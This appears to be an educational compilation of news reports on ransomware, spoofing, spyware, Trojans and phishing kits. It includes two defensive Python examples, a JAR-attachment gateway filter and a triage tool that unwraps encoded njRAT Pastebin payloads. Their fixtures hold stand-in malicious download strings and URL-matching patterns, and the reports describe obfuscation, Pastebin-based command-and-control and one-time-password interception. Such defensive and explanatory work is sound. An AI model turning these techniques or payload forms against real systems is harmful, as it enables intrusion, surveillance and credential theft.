“the most significant breach of U.S. military computers ever”. They banned the use
of portable drives immediately and spent fourteen months removing all traces of
the worm. 
Since the incident occurred over 10 years ago, it’s tempting to think it won’t be
repeated, but that idea, comforting as it may be, is a fantasy. A recent report on
national cybersecurity found that 74% of 95 federal agencies reviewed were either
"At Risk" or "At High Risk" of attack, the latter designation meaning
that immediate intervention is required.   

5.  US Healthcare Network

Healthcare providers must be particularly vigilant about protecting
themselves since the sector attracts more than its fair share of attacks. Most
attacks stem from lone wolves or small-scale criminal affiliates, but the SamSam
ransomware attacks challenge that norm – suggesting hostile state involvement.

The ransomware attacks took place over three years, extorting $6 million in
payments and resulting in $30 million in damages. All told, only seven of the US’
50 states escaped totally unscathed. That said, there’s still a high probability that
there are other victims out there who have not disclosed their attacks or may not
even be aware of them yet.

SamSam has been around since 2016, with security company Sophos reporting
that attacks have occurred daily since the malware first arrived on the scene. It’s
estimated healthcare accounts for about a quarter of all attacks.
Some of the prominent victims included Hollywood Presbyterian Medical
Center, (which had to turn patients away before capitulating and paying the
ransom), LabCorp (the nation's largest diagnostic blood testing company),
and Kansas Heart Hospital (which paid the initial ransom and were then hit by
another demand).

Although there were no recorded fatalities attributable to the attacks, it’s only a
matter of time before a series of coordinated attacks like this one results in such an
outcome.
In November 2018, US Federal prosecutors indicted two Iranian hackers. “The
allegations in the indictment… outline an Iran-based international computer
hacking and extortion scheme that engaged in a 21st-Century digital
blackmail,” said US assistant attorney general Brian Benczkowski.
There are two particularly worrying aspects of this attack:
• The likely involvement of a hostile government that has ample resources to
mount similar attacks again and again.
• The extended time period — over three years! — during which attacks took
place, without drawing any suspicion of a connection.

What is Spoofing?

Spoofing is a fraudulent act in which communication from an unknown source is
disguised as being from a source that is known to and trusted by the recipient. A
spoofing attack occurs when a person (referred to as a spoofer) pretends to be
someone else in order to trick their target into sharing their personal data or
performing some action on behalf of the spoofer. The spoofer will often take time
and make an effort to build trust with their target, thus ensuring that they will share
their sensitive data more easily.
As a type of impersonation carried out via technological means, spoofing can take
on many forms. In its most primitive form, spoofing refers to impersonation via
telephone. For example, when a caller on the other end falsely introduces
themselves as a representative of your bank and asks for your account or credit
card info, you are a victim of phone spoofing. To make their fake calls seem more
believable, spoofers have also started using software to fake caller IDs, an act
known as phone number spoofing.

Real life examples of Spoofing Attacks

Some of the best-known examples of spoofing attacks include the following:

• In 2006, unknown hackers carried out a major DNS spoofing attack – the
first of its kind – against three local banks in Florida. The attackers hacked
the servers of the internet provider that hosted all three websites and
rerouted traffic to fake login pages designed to harvest sensitive data from
unsuspecting victims. This allowed them to collect an undisclosed
number of credit card numbers and PINs along with other personal
information belonging to their owners.
• In June 2018, hackers carried out a two-day DDoS spoofing attack against
the website of the American health insurance provider Humana. During the
incident, which was said to have affected at least 500 people, the hackers
managed to steal complete medical records of Humana’s clients, including
the details of their health claims, services received, and related expenses.
• In 2015, unidentified hackers used DNS spoofing techniques to
redirect traffic from the official website of Malaysia Airlines. The new
homepage showed an image of a plane with the text “404 – Plane Not
Found” superimposed over it. Although no data was stolen or compromised
during the attack, it blocked access to the website and flight status checks
for a few hours.

What is a Grey Hat Hacker?

A grey hat hacker is an individual who employs illegal means to discover threats
even though he/she does not share the malicious intent commonly attributed to
black hat hackers. Grey hat hackers occupy the middle ground that lies between
white hat hackers who aim to protect systems and networks from attacks and black
hat hackers who exploit vulnerabilities for malicious gain. In essence, a grey hat
hacker looks for vulnerabilities without the hardware or software manufacturer’s
permission to spread awareness about his/her findings.

Grey hat hackers are like modern-day Robin Hoods who are willing to forgo ethics
and laws for the greater good.

Notable Examples of Grey Hat Hacking

ASUS Routers

In 2014, a grey hat hacker successfully accessed thousands of ASUS routers to
warn users about potentially exposing their files if they didn’t patch the
vulnerability he discovered.

Linux Routers

A team of grey hat hackers known as the “White Team” identified a security hole
in specific Linux router models in 2015. To remedy the flaw, the group released
malware that would allow affected users to plug the security gap.

Online Printers

Back in 2017, a grey hat hacker remotely operated more than 150,000 printers to
warn their users about the risks of leaving online printers exposed.

MikroTik Routers

Russian grey hat hacker Alexey patched over 100,000 MikroTik routers to prevent
cryptocurrency miners from exploiting a vulnerability.

While these grey hat hackers had no malicious intentions, the invasion of privacy
they committed was not well-received.

What Is Spyware?

Spyware is malicious software that infects computers and other internet-connected devices
and secretly records your browsing habits, the websites you visit, and your online purchases.
Some types of spyware also record your passwords, login credentials, and credit card details.
This information is then forwarded to the spyware author, who can either use it for their own
personal gain or sell it to a third party.
Like all other types of malicious software, spyware is installed on your computer without
your consent. It is usually bundled with legitimate software that you have intentionally
downloaded (like file-sharing programs and other freeware or shareware applications), but
you can also unwittingly download it by visiting malicious websites or clicking on links and
attachments in infected emails. As soon as you install it, spyware will attach itself to your
operating system and start running quietly in the background.
The term spyware was coined in the mid-1990s, but the software itself had existed long
before that. At first, developers would add a spyware component to their programs to track
their usage. They would then approach potential advertisers with these stats or utilize them to
detect any unlicensed use of the software. By the early noughties, however, more than 90
percent of computer users worldwide had their machines infected with some form of
spyware, unknowingly installed without their permission.
Nowadays, there are many spyware programs in circulation, some even bundled with
hardware. Rather than targeting individual users, the creators of spyware aim to gather as
much data as possible and sell it to advertisers, spammers, scammers, or hackers. With new
forms of malicious software being released every few seconds, no one is safe from spyware.
Even the companies you trust use spyware to track your behavior, which you have allowed
them to do when you accepted their End User License Agreement.

Real life Examples of Spyware 

1. New Android spyware targets users in Pakistan

SophosLabs has discovered a small cluster of Trojanized versions of Android apps,
mainly marketed to people who live in Pakistan. Someone has modified these
otherwise legitimate apps (clean versions are available for download on the Google
Play Store) to add malicious features that seem completely focused on covert
surveillance and espionage.

The modified apps look identical to their legitimate counterparts, and even perform
their normal functions, but are designed to, initially, profile the phone, and then
download a payload in the form of an Android Dalvik executable (DEX) file. The
DEX payload contains most of the malicious features, which include the ability to
covertly exfiltrate sensitive data like the user’s contact list and the full contents of
SMS messages. The app then sends this information to one of a small number of
command-and-control websites hosted on servers located in eastern Europe.

The selection of apps is highly peculiar, as they are neither the most popular, nor
particularly unique, apps. There’s no indication that the publishers of the original
apps are aware that these Trojanized versions even exist. The highest-profile app
Trojanized in this way is the Pakistan Citizen Portal app, published by the
government of Pakistan, but the Trojanized version never appeared in any
legitimate market, as far as we know. (SophosLabs made multiple attempts to
disclose this information to the government of Pakistan, the publisher of the app,
prior to publication.)

2. Dozens of journalists’ iPhones hacked with NSO ‘zero-click’ spyware,
says Citizen Lab
For more than the past year, London-based reporter Rania Dridi and at least 36
journalists, producers and executives working for the Al Jazeera news agency were
targeted with a so-called “zero-click” attack that exploited a now-fixed vulnerability
in Apple’s iMessage. The attack invisibly compromised the devices without having
to trick the victims into opening a malicious link.
Citizen Lab, the internet watchdog at the University of Toronto, was asked to
investigate earlier this year after one of the victims, Al Jazeera investigative
journalist Tamer Almisshal, suspected that his phone may have been hacked.
In a technical report out Sunday and shared with TechCrunch, the researchers say
they believe the journalists’ iPhones were infected with the Pegasus spyware,
developed by Israel-based NSO Group.
The researchers analyzed Almisshal’s iPhone and found it had between July and
August connected to servers known to be used by NSO for delivering the Pegasus
spyware. The device revealed a burst of network activity that suggests that the
spyware may have been delivered silently over iMessage.
Logs from the phone show that the spyware was likely able to secretly record the
microphone and phone calls, take photos using the phone’s camera, access the
victim’s passwords and track the phone’s location.
Citizen Lab said the bulk of the hacks were likely carried out by at least four NSO
customers, including the governments of Saudi Arabia and the United Arab
Emirates, citing evidence it found in similar attacks involving Pegasus.
The researchers found evidence that two other NSO customers hacked into one and
three Al Jazeera phones respectively, but that they could not attribute the attacks to a
specific government.
A spokesperson for Al Jazeera, which just broadcast its reporting of the hacks, did
not immediately comment.
NSO sells governments and nation-states access to its Pegasus spyware as a
prepackaged service by providing the infrastructure and the exploits needed to
launch the spyware against the customer’s targets. But the spyware maker has
repeatedly distanced itself from what its customers do and has said it does not know
who its customers target. Some of NSO’s known customers include authoritarian
regimes. Saudi Arabia allegedly used the surveillance technology to spy on the
communications of columnist Jamal Khashoggi shortly before his murder, which
U.S. intelligence concluded was likely ordered by the kingdom’s de facto ruler,
Crown Prince Mohammed bin Salman.
Citizen Lab said it also found evidence that Dridi, a journalist at Arabic television
station Al Araby in London, had fallen victim to a zero-click attack. The researchers
said Dridi was likely targeted by the UAE government.
In a phone call, Dridi told TechCrunch that her phone may have been targeted
because of her close association to a person of interest to the UAE.
Dridi’s phone, an iPhone XS Max, was targeted for a longer period, likely between
October 2019 and July 2020. The researchers found evidence that she was targeted
on two separate occasions with a zero-day attack — the name of an exploit that has
not been previously disclosed and for which a patch is not yet available — because
her phone was running the latest version of iOS both times.
“My life is not normal anymore. I don’t feel like I have a private life again,” said
Dridi. “To be a journalist is not a crime,” she said.
Citizen Lab said its latest findings reveal an “accelerating trend of espionage”
against journalists and news organizations, and that the growing use of zero-click
exploits makes it increasingly difficult — though evidently not impossible — to
detect because of the more sophisticated techniques used to infect victims’ devices
while covering their tracks.
When reached on Saturday, NSO said it was unable to comment on the allegations
as it had not seen the report, but declined to say when asked if Saudi Arabia or the
UAE were customers or describe what processes — if any — it puts in place to
prevent customers from targeting journalists.
“This is the first we are hearing of these assertions. As we have repeatedly stated, we
do not have access to any information related to the identities of individuals upon
whom our system is alleged to have been used to conduct surveillance. However,
when we receive credible evidence of misuse, combined with the basic identifiers of
the alleged targets and timeframes, we take all necessary steps in accordance with
our product misuse investigation procedure to review the allegations,” said a
spokesperson.
“We are unable to comment on a report we have not yet seen. We do know that
CitizenLab regularly publishes reports based on inaccurate assumptions and without
a full command of the facts, and this report will likely follow that theme. NSO
provides products that enable governmental law enforcement agencies to tackle
serious organized crime and counterterrorism only, but as stated in the past, we do
not operate them. Nevertheless, we are committed to ensuring our policies are
adhered to, and any evidence of a breach will be taken seriously and investigated.”
Spokespeople for the Saudi and UAE governments in New York did not respond to
an email requesting comment.
The attacks not only put a renewed focus on the shadowy world of surveillance
spyware, but also on the companies having to defend against it. Apple rests much of its
public image on advocating privacy for its users and building secure devices, like
iPhones, designed to be hardened against the bulk of attacks. But no technology is
impervious to security bugs. In 2016, Reuters reported that UAE-based
cybersecurity firm DarkMatter bought a zero-click exploit to target iMessage, which
they referred to as “Karma.” The exploit worked even if the user did not actively use
the messaging app.
Apple told TechCrunch that it had not independently verified Citizen Lab’s findings
but that the vulnerabilities used to target the reporters were fixed in iOS 14, released
in September.
“At Apple, our teams work tirelessly to strengthen the security of our users’ data and
devices. iOS 14 is a major leap forward in security and delivered new protections
against these kinds of attacks. The attack described in the research was highly
targeted by nation-states against specific individuals. We always urge customers to
download the latest version of the software to protect themselves and their data,”
said an Apple spokesperson.
NSO is currently embroiled in a legal battle with Facebook, which last year blamed
the Israeli spyware maker for using a similar, previously undisclosed zero-click
exploit in WhatsApp to infect some 1,400 devices with the Pegasus spyware.
Facebook discovered and patched the vulnerability, stopping the attack in its tracks,
but said that more than 100 human rights defenders, journalists and “other members
of civil society” had fallen victim.

3. New Goontact spyware discovered targeting Android and iOS users

Security researchers have discovered a new malware strain with spying and
surveillance capabilities —also known as spyware— that is currently available in
both Android and iOS versions.
Named Goontact, this malware has the ability to collect from infected victims data
such as phone identifiers, contacts, SMS messages, photos, and location
information.
Detected by mobile security firm Lookout, the Goontact malware is currently
distributed via third-party sites promoting free instant messaging apps dedicated to
reaching escort services.

The target audience of these sites appears to be limited at the moment to Chinese
speaking countries, Korea, and Japan, Lookout said in a report shared today
with ZDNet.
Although the malware has yet to reach official Apple and Google app stores, there
are signs that users are downloading and side-loading Goontact-infected
applications.

Data collected from these apps is sent back to online servers under the Goontact
operators' control. Based on the language used for the admin panels of these
servers, Lookout believes the Goontact operation is most likely managed by
Chinese-speaking threat actors.
LINKS SUGGEST CONNECTION TO PAST SEXTORTION CAMPAIGN
Apurva Kumar, Staff Security Intelligence Engineer at Lookout, told ZDNet that
the Goontact operation is very similar to a sextortion campaign described by Trend
Micro in 2018 (PDF).
Although there is no tangible evidence at the moment, Kumar believes that data
collected through these apps could later be used to extort victims into paying small
ransoms or have their attempts to arrange sexual encounters exposed to friends and
contacts.

"We have notified both Google and Apple of this threat and are actively
collaborating with them to protect all Android and iOS users from Goontact,"
Kumar told ZDNet in an email over the weekend.
"Apple has revoked the enterprise certificates used to sign the apps and, as a result,
the apps will stop working on devices," the Lookout security engineer added.

"Play Protect will notify a user if any Goontact Android samples are installed on
their device."

The list of names of all Goontact-infected apps is pretty exhaustive and is too long
to list here, but can be found at the end of this Lookout report, in case users want to
check and see if they've downloaded and installed any of the apps. The sites that
peddled Goontact-infected apps are listed below.

4. European Parliament paves path for tighter spyware export controls

The European Parliament announced Monday that it is taking steps to curtail the exportation
of surveillance technologies, including spyware, outside of the European Union.

The action clears the path for the European Union to establish new ground rules for the
export and sale of so-called dual-use technologies, which can be used in legitimate but also
malicious ways that violate human rights. The premise of the new rules is to limit
authoritarian regimes’ ability to “secretly get their hands on European cyber-surveillance,”
Markéta Gregorovà, a member of European Parliament and a lead negotiator of the new
scheme, said in a statement.

The new guardrails will include an update to European export controls, such as inclusion of
licensing criteria that more heavily emphasize human rights, and an EU-wide scheme that
dictates stricter export reporting requirements for member states.
“Parliament’s perseverance and assertiveness against a blockade by some member states has
paid off: respect for human rights will become an export standard,” Bernd Lange, a head of
the negotiating delegation and member of European Parliament, said in a statement. “It is an
EU milestone, as export rules for surveillance technologies have been agreed for the first
time. Economic interests must not take precedence over human rights.”

Human rights groups and advocates have been trying to make inroads in limiting the export
of spyware in recent years around the world, but have been obstructed by courts and lack of
political will. The EU’s forthcoming stricter controls on the transfer of spyware marks a step
forward for those trying to stymie human rights abuses that can result
when surveillance technologies fall into the wrong hands.

Officials at the United Nations called last year for a moratorium on the sale, transfer, and
export of spyware worldwide. Security researchers have also called for stricter controls on
state-sponsored malware and surveillance tools.

But when lawyers from Amnesty International asked a judge in Israel to revoke the export
license of Israeli software surveillance firm NSO Group over allegations its technologies
were used against dissidents and human rights activists, they were rejected.

European Parliament’s announcement is not entirely a surprise — the EU has been working
to better control dual-use technologies for years. The move comes four years after the
European Commission tabled a proposal on how EU member states sell dual-use goods
outside the bloc, in which negotiators argued surveillance technologies must be included in
consideration.

“The type of arms most relevant for armed conflicts have changed over time and continue to
change rapidly,” the negotiators wrote in an explanatory statement. “The EU needs to react to
this threat by including cyber technologies in the EU export control regime, so that this
technology is not used to seriously violate human rights and, thereby, undermine security,
democracy, pluralism and freedom of expression.”

The action is not finalized yet, as the International Trade Committee, Parliament, and the
Council still need to endorse the agreement, according to European Parliament.

5. A detailed analysis of spyware masquerading as TikTok

A recent threat to ban TikTok in the United States has taken the internet by storm
and received mixed reactions from social media and internet users. U.S. President
Donald Trump has ordered ByteDance, the parent company of TikTok, to sell its
U.S. TikTok assets and also issued executive orders that would ban the social
media apps TikTok and WeChat from operating in the U.S. if the sale doesn’t
happen in the next few weeks. On the other side, ByteDance has filed a
lawsuit suing the Trump administration.
When popular applications come under fire and are featured prominently in the
news, hackers get excited as these newsworthy apps can become their latest target.
And TikTok is no exception.

Generally, after an application gets banned from an official app store, such as
Google Play, users try to find alternative ways to download the app. In doing so,
users can fall victim to malicious apps portraying themselves as the original
app. Recently there was a huge wave of SMS messages, as well as WhatsApp
messages, making the rounds asking users to download the latest version of
TikTok at hxxp://tiny[.]cc/TiktokPro. In reality, the downloaded app is
a fake that asks for credentials and Android permissions (including camera and
phone permissions), resulting in the user being bombarded with advertisements.

Recently, we have come across another variant of this app portraying itself as
TikTok Pro, but this one is full-fledged spyware with premium features to spy on
victims with ease. (Please note this is a different app and not the same as the one
being spread by hxxp://tiny[.]cc/TiktokPro.)

What is a Trojan?
A Trojan is a type of malicious code or software that looks legitimate but can take
control of your computer. A Trojan is designed to damage, disrupt, steal, or in
general inflict some other harmful action on your data or network.
A Trojan acts like a bona fide application or file to trick you. It seeks to deceive you
into loading and executing the malware on your device. Once installed, a Trojan can
perform the action it was designed for.
A Trojan is sometimes called a Trojan virus or a Trojan horse virus, but that’s a
misnomer. Viruses can execute and replicate themselves. A Trojan cannot: a user
has to execute it. Even so, “Trojan malware” and “Trojan virus” are often used
interchangeably.
Whether you prefer calling it Trojan malware or a Trojan virus, it’s smart to know how
this infiltrator works and what you can do to keep your devices safe.

Real life examples of Trojan attacks


1. President Trump-themed Malspam Email Delivers QRat trojan

A new phishing campaign has been observed using a fake Donald Trump video as
a lure for malware delivery. The campaign enables hackers to remotely control the
infected system via QRat and provides the ability to steal passwords, along with
sensitive data.
What has happened?

The phishing emails use unrelated subject lines and filenames. The email
subject claims to offer the victim a loan with a good value for money
investment to entice victims. However, the email comes with a malicious
attachment, claiming to be a video of President Donald Trump.

• If a user attempts to open the file, a Java Archive (JAR), the QRat installer
is executed.
• The trojan uses multiple layers of obfuscation to avoid being detected as
malicious activity. The code is encoded in base64. In addition, it uses
Allatori Obfuscator to hide its modules.
• The malicious code of the malware downloader is split into numbered files,
along with some junk data.
• In addition, the malware uses a scam Microsoft ISC license, which shows a
message telling the user that the JAR file is being run for remote penetration
testing.

Recent incidents

• Recently, ElectroRAT was spotted stealing cryptocurrency wallets from
thousands of Windows, Linux, and macOS users.
• APT27 has been observed using PlugX RAT in a set of ransomware
incidents.

Conclusion

The increasing use of RATs in cyberattacks, now with additional layers of
obfuscation, makes security a pressing concern. Thus, experts suggest email
administrators take action against inbound JARs and block them in their email
security gateways to prevent JAR-based malware attacks. In addition,
organizations should train their employees to spot phishing
emails.
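The conclusion above recommends blocking inbound JARs at the email gateway. As an added example (not code from the report or its authors), the Python below classifies attachments by their bytes rather than by filename or MIME type, so a JAR presented as a video is still caught; the message, addresses and filenames are constructed.

```python
"""Content-based JAR attachment filter (added example, not the report's code).

A JAR is a ZIP archive; the filename and MIME type are chosen by the sender,
so the check inspects the bytes: ZIP magic plus a Java manifest or .class
entries. The message and attachments built below are constructed samples.
"""
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

ZIP_MAGIC = b"PK\x03\x04"


def looks_like_jar(data: bytes) -> bool:
    """True when the bytes are a ZIP holding META-INF/MANIFEST.MF or .class
    files, whatever extension or Content-Type the sender declared."""
    if not data.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return False
    has_manifest = any(n.upper() == "META-INF/MANIFEST.MF" for n in names)
    has_class = any(n.lower().endswith(".class") for n in names)
    return has_manifest or has_class


def scan_message(raw: bytes) -> list:
    """Walk every attachment of an RFC 822 message and report JAR findings."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""
        findings.append({
            "filename": part.get_filename() or "<unnamed>",
            "declared_type": part.get_content_type(),
            "is_jar": looks_like_jar(payload),
        })
    return findings


def should_block(raw: bytes) -> bool:
    """Gateway policy the article recommends: hold any inbound mail with a JAR."""
    return any(f["is_jar"] for f in scan_message(raw))


def make_zip(entries: dict) -> bytes:
    """Build an in-memory ZIP/JAR from {name: content} (fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_message() -> bytes:
    """Constructed lure: a 'video' attachment that is really a JAR, plus a
    harmless ZIP that must not be flagged. All names are made up."""
    jar = make_zip({
        "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\nMain-Class: Loader\n",
        "Loader.class": b"\xca\xfe\xba\xbe" + b"\x00" * 16,  # class-file magic only
    })
    harmless = make_zip({"readme.txt": b"quarterly figures attached"})
    msg = EmailMessage()
    msg["From"] = "loans@sender.example"
    msg["To"] = "user@victim.example"
    msg["Subject"] = "Loan offer - good value investment"
    msg.set_content("Please see the attached video.")
    # Extension and MIME type both claim a video; only the bytes tell the truth.
    msg.add_attachment(jar, maintype="video", subtype="mp4",
                       filename="Trump_video.mp4")
    msg.add_attachment(harmless, maintype="application", subtype="zip",
                       filename="figures.zip")
    return bytes(msg)


if __name__ == "__main__":
    raw = build_sample_message()
    for finding in scan_message(raw):
        print(finding)
    print("block message:", should_block(raw))
```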

2. njRAT Trojan operators are now using Pastebin as alternative to central command server

Operators of the njRAT Remote Access Trojan (RAT) are leveraging Pastebin C2
tunnels to avoid scrutiny by cybersecurity researchers.
Palo Alto Networks' Unit 42 cybersecurity team said njRAT, also known as
Bladabindi, is being used to download and execute secondary-stage payloads from
Pastebin, scrapping the need to establish a traditional command-and-control (C2)
server altogether.

Since October, at least, operators have used Pastebin, a text storage and release
platform, as a host for payloads which differ in form and shape. In some cases,
dumps are base64 encoded; in others, hexadecimal and JSON data masks the true
nature of a dump; some are compressed blobs, and others are simply plaintext
instructions containing embedded, malicious URLs.

The team says that njRAT variants will call upon shortened URLs linking to
Pastebin in an attempt to "evade detection by security products and increase the
possibility of operating unnoticed."

Developed in .NET, njRAT is a widely-used Trojan that is able to hijack the
functions of a compromised machine remotely, including taking screenshots,
exfiltrating data, keylogging, and killing processes such as antivirus programs. In
addition, the RAT is able to execute secondary, malicious payloads and connect
infected PCs to botnets.

The "Pastebin C2 tunnel" now in use, as described by the researchers, creates a
pathway between njRAT infections and new payloads. With the Trojan acting as a
downloader, it will grab encoded data dumped on Pastebin, decode, and deploy.

In samples viewed by the team, one payload was decoded as a .NET executable
that abuses Windows API functions for keylogging and data theft. Other samples,
similar in function, required multiple layers of decoding to reveal the final
payload.
JSON-formatted data, disguised on Pastebin, is believed to potentially act as
configuration files for the malware. Pastebin dumps have also been used to point
toward software downloads, including links to ProxyScraper.

Palo Alto says the Pastebin-based command architecture is still active and utilized
by the RAT to deliver secondary payloads.

"Based on our research, malware authors are interested in hosting their second-
stage payloads in Pastebin and encrypting or obfuscating such data as a measure to
evade security solutions," the team says. "There is a possibility that malware
authors will use services like Pastebin for the long term."
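The report describes pastes that arrive base64-encoded, hex-encoded, wrapped in JSON, compressed, or as plain text carrying URLs, sometimes nested several layers deep. As an added example (not Unit 42's tooling), the Python below is a triage helper that unwraps those layers until it reaches a PE image or embedded URLs and reports the chain it went through; the pastes, the fake PE header and all function names are constructed.

```python
"""Layer-peeling triage for Pastebin-hosted njRAT payloads (added example, not
Unit 42's code).

Given the text a sample fetched from a paste, repeatedly unwrap the forms the
report lists (JSON values, hex, base64, gzip/zlib) until a PE image, a set of
URLs, or opaque bytes remains, and record the chain of layers. The pastes below
are constructed; the "PE" is only an MZ/PE header, not a real binary.
"""
import base64
import binascii
import gzip
import json
import re
import zlib
from typing import Optional, Tuple

URL_RE = re.compile(rb"https?://[^\s\"'<>]+")
B64_RE = re.compile(rb"^[A-Za-z0-9+/=\s]+$")
HEX_RE = re.compile(rb"^[0-9A-Fa-f\s]+$")


def peel_once(data: bytes) -> Optional[Tuple[str, bytes]]:
    """Undo one encoding layer; return (layer_name, inner) or None."""
    if data[:2] == b"\x1f\x8b":
        try:
            return "gzip", gzip.decompress(data)
        except (OSError, EOFError):
            return None
    if data[:1] == b"\x78":  # zlib header; base64 text may also start with 'x'
        try:
            return "zlib", zlib.decompress(data)
        except zlib.error:
            pass
    d = data.strip()
    if d[:1] == b"{":  # JSON "config": take the longest string value as the blob
        try:
            vals = [v for v in json.loads(d).values() if isinstance(v, str)]
            return "json", max(vals, key=len).encode()
        except (ValueError, AttributeError):
            pass
    if len(d) >= 8 and HEX_RE.match(d):
        try:
            return "hex", binascii.unhexlify(b"".join(d.split()))
        except binascii.Error:
            pass
    if len(d) >= 8 and B64_RE.match(d):
        try:
            return "base64", base64.b64decode(b"".join(d.split()), validate=True)
        except binascii.Error:
            pass
    return None


def classify(data: bytes) -> str:
    """Innermost layer: a Windows executable, URL instructions, or unknown."""
    if data[:2] == b"MZ":
        return "pe"
    return "urls" if URL_RE.search(data) else "opaque"


def triage(paste: bytes, max_layers: int = 8) -> dict:
    """Peel layers until a payload or URLs appear, or nothing decodes further."""
    layers, current = [], paste
    for _ in range(max_layers):
        if classify(current) != "opaque":
            break
        step = peel_once(current)
        if step is None:
            break
        name, current = step
        layers.append(name)
    urls = [u.decode("ascii", "replace") for u in URL_RE.findall(current)]
    return {"layers": layers, "kind": classify(current), "urls": urls,
            "size": len(current)}


# Constructed fixtures mirroring the forms the report describes.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 64
CONFIG_PASTE = json.dumps({"ver": "1", "cfg": base64.b64encode(
    gzip.compress(FAKE_PE)).decode()}).encode()
HEX_PASTE = binascii.hexlify(base64.b64encode(b"update http://example.invalid/stage2.exe"))
ZLIB_PASTE = zlib.compress(FAKE_PE)
PLAIN_PASTE = b"run http://example.invalid/a.exe then sleep"

if __name__ == "__main__":
    for sample in (CONFIG_PASTE, HEX_PASTE, ZLIB_PASTE, PLAIN_PASTE):
        print(triage(sample))
```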

Real life examples of phishing


1. Google Firebase hosts Microsoft Office phishing attack

A phishing attack recently uncovered by researchers pretends to share information
about an electronic funds transfer (EFT) by offering up a link to download an
HTML invoice that then loads to a page with Microsoft Office branding that’s
hosted on Google Firebase.

The attack culminates with a final phishing page that looks to extract a victim’s
Microsoft login credentials, alternate email address, and phone number, Armorblox
researchers wrote in a blog post.

Impersonating Microsoft to phish for account credentials continues to be a
powerful technique because it’s a way for attackers to insert themselves into
normal business workflows, said Rajat Upadhyaya, head of engineering at
Armorblox.

“Viewing documents via Office 365 is something we do every day, so victims
might think it’s not unusual to enter login credentials in this situation,” Upadhyaya
said. “Plus, hosting the final phishing page on Google Firebase lends the domain
inherent legitimacy and allows it to bypass email security blocklists and filters.”

The email attack bypassed native Microsoft email security controls. Microsoft
assigned a Spam Confidence Level (SCL) of ‘1’ to this email, which means the
tech giant did not flag the email as suspicious and delivered it to end-user
mailboxes.
“The individual techniques have been employed by hackers before, but it’s the
combination of techniques that makes it possible for this email attack to bypass
Microsoft email security as well as pass the eye tests of victims,” Upadhyaya said.

“Employing link redirects and a downloadable HTML file to view the final
payload makes it difficult for security technologies to follow the link to its final
destination,” he explained.

2. U.K. Arrest in ‘SMS Bandits’ Phishing Service

Authorities in the United Kingdom have arrested a 20-year-old man for allegedly
operating an online service for sending high-volume phishing campaigns via
mobile text messages. The service, marketed in the underground under the name
“SMS Bandits,” has been responsible for blasting out huge volumes of phishing
lures spoofing everything from COVID-19 pandemic relief efforts to PayPal,
telecommunications providers and tax revenue agencies.
The U.K.’s National Crime Agency (NCA) declined to name the suspect, but
confirmed that the Metropolitan Police Service’s cyber crime unit had detained an
individual from Birmingham in connection to a business that supplied “criminal
services related to phishing offenses.”
The proprietors of the phishing service were variously known on cybercrime
forums under handles such as SMSBandits, “Gmuni,” “Bamit9,” and “Uncle
Munis.” SMS Bandits offered an SMS phishing (a.k.a. “smishing”) service for the
mass sending of text messages designed to phish account credentials for different
popular websites and steal personal and financial data for resale.

For example, SMS Bandits ran automated checks on whether the phone number
lists provided by their customers were indeed tied to actual mobile numbers,
and not landlines that might tip off telecommunications companies about mass
spam campaigns.

“The telcos are monitoring for malicious SMS messages on a number of fronts,”
Angus said. “One way to tip off an SMS gateway or wireless provider is to start
blasting text messages to phone numbers that can’t receive them.”
Scylla gathered reams of evidence showing the SMS Bandits used email addresses
and passwords stolen through its services to validate a variety of account
credentials — from PayPal to bank accounts and utilities providers. They would
then offload the working credentials onto marketplaces they controlled, and to
third-party vendors. One of SMS Bandits’ key offerings: An “auto-shop” web
panel for selling stolen account credentials.

SMS Bandits also provided their own “bulletproof hosting” service advertised as a
platform that supported “freedom of speach” [sic] where customers could “host
any content without restriction.” Invariably, that content constituted sites designed
to phish credentials from users of various online services.

The SMS Bandits phishing service is tied to another crime-friendly service called
“OTP Agency,” a bulk SMS provider that appears catered to phishers: The
service’s administrator stated on multiple forums that he worked directly with the
SMS Bandits.

Otp[.]agency advertises a service designed to help intercept one-time passwords
needed to log in to various websites. The customer enters the target’s phone
number and name, and OTP Agency will initiate an automated phone call to the
target that alerts them about unauthorized activity on their account.

The call prompts the target to enter a one-time password generated by their
phone’s mobile app, and that code is then relayed back to the scammer’s user panel
at the OTP Agency website.

“We call the holder with an automatic calling bot, with a very believable script,
they enter the OTP on the phone, and you’ll see it in real time,” OTP Agency
explained on their Telegram channel. The service, which costs anywhere from $40
to $125 per week, advertises unlimited international calling, as well as multiple
call scripts and voice accents.

3. New cybercrime tool can build phishing pages in real-time

A cybercrime group has developed a novel phishing toolkit that changes logos and
text on a phishing page in real-time to adapt to targeted victims.
Named LogoKit, this phishing tool is already deployed in the wild, according to
threat intelligence firm RiskIQ, which has been tracking its evolution.
The company said it already identified LogoKit installs on more than 300 domains
over the past week and more than 700 sites over the past month.

The security firm said LogoKit relies on sending users phishing links that contain
their email addresses.

"Once a victim navigates to the URL, LogoKit fetches the company logo from a
third-party service, such as Clearbit or Google's favicon database," RiskIQ security
researcher Adam Castleman said in a report on Wednesday.
"The victim email is also auto-filled into the email or username field, tricking
victims into feeling like they have previously logged into the site," he added.

"Should a victim enter their password, LogoKit performs an AJAX request,
sending the target's email and password to an external source, and, finally,
redirecting the user to their [legitimate] corporate web site."

Castleman said LogoKit achieves this only with "an embeddable set of JavaScript
functions" that can be added to any generic login form or complex HTML
documents.

This is different from standard phishing kits, most of which need pixel-perfect
templates mimicking a company's authentication pages.

The kit's modularity allows LogoKit operators to target any company they want
with very little customization work and mount tens or hundreds of attacks a week
against a wide-ranging set of targets.

RiskIQ said that over the past month, it has seen LogoKit being used to mimic and
create login pages for services ranging from generic login portals to false
SharePoint portals, Adobe Document Cloud, OneDrive, Office 365, and several
cryptocurrency exchanges.

Because LogoKit is so small, the phishing kit doesn't always need its own complex
server setup, as some other phishing kits need. The kit can be hosted on hacked
sites or legitimate pages for the companies LogoKit operators want to target.
